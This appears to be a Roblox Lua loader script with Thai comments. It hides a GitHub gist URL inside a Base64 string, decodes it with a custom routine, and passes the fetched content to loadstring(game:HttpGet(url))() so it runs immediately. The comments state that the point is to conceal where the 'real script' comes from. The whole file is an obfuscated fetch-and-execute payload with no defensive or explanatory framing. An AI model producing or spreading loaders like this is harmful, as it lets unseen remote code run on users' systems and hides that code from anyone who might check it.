-- ฟังก์ชันซ่อน URL (Base64 encode)
local function getURL()
    local encoded = "aHR0cHM6Ly9naXN0LmdpdGh1Yi5jb20vbGFyOTIwODUtYmVlcC80MjM2YTI0ZTNjOTliZWI3ZGZiMTZhMDdjYWZlZTVmNy9yYXcv" -- นี่คือ Base64 ของลิงก์ raw
    local b='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/'
    encoded = encoded:gsub('[^'..b..'=]', '')
    return (encoded:gsub('.', function(x)
        if x == '=' then return '' end
        local r,f='',(b:find(x)-1)
        for i=6,1,-1 do r=r..(f%2^i - f%2^(i-1) > 0 and '1' or '0') end
        return r;
    end):gsub('%d%d%d%d%d%d%d%d', function(x)
        local c=0
        for i=1,8 do c=c + (x:sub(i,i)=='1' and 2^(8-i) or 0) end
        return string.char(c)
    end))
end

-- โหลดสคริปต์จริงจาก URL ที่ซ่อน
local url = getURL()
loadstring(game:HttpGet(url))()
